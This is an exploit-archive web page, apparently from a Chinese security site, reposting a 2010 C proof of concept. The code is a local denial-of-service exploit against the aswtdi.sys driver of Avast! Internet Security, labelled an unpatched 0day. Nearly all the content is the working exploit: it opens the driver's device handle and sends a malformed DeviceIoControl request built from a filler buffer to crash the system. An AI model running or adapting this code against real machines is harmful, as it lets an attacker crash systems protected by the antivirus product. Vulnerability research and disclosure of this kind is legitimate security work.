首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Avast! Internet Security aswtdi.sys 0day Local DoS PoC
来源:CISS Research Team 作者:Tarakanov 发布时间:2010-11-05  

/*
# Exploit Title: Avast! Internet Security aswtdi.sys 0day Local DoS PoC
# Date: 2010-11-04
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link: http://www.avast.com
# Version: up to date, version 5.0.677, aswtdi.sys version 5.0.677
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <io.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>
#include <share.h>


int main(int argc, char **argv)
{
    HANDLE   hDevice;
    DWORD    cb;
    void        *buff;
    int len = 0;
    int pfh;
    int outlen = 0, inlen = 0;
    DWORD ioctl = 0x800515A8;
    char deviceName[] = "\\\\.\\aswTdi";

    if ( (hDevice = CreateFileA(deviceName,
                          GENERIC_READ|GENERIC_WRITE,
                          0,
                          0,
                          OPEN_EXISTING,
                          0,
                          NULL) ) != INVALID_HANDLE_VALUE )
    {
        printf("Device  succesfully opened!\n");
    }
    else
    {
        printf("Error: Error opening device \n");
        return 0;
    }

    cb = 0;
    buff = malloc(0x2000);
    if(!buff){
      printf("malloc failed");
      return 0;
    }
    memset(buff, 'A', 0x2000-1);
    ioctl = 0x80000004;
    inlen = 4;

    outlen = 4;
    DeviceIoControl(hDevice, ioctl, (LPVOID)buff, inlen, (LPVOID)buff,
outlen, &cb, NULL);
    free(buff);

    printf("done!");
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Explorer Memory Corru
·Internet Explorer 6, 7, 8 Memo
·CA BrightStor ARCserve for Lap
·Sami HTTP Server 2.0.1 GET Req
·GSPlayer 1.83a Win32 Release B
·WinTFTP Server Pro v3.1 (0day)
·CA BrightStor ARCserve for Lap
·Avidemux <= 2.5.4 Buffer Overf
·Internet Explorer CSS Tags Mem
·FileFuzz Denial of service vul
·Webster HTTP Server GET Buffer
·PHP 5.3.3/5.2.14 ZipArchive::g
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved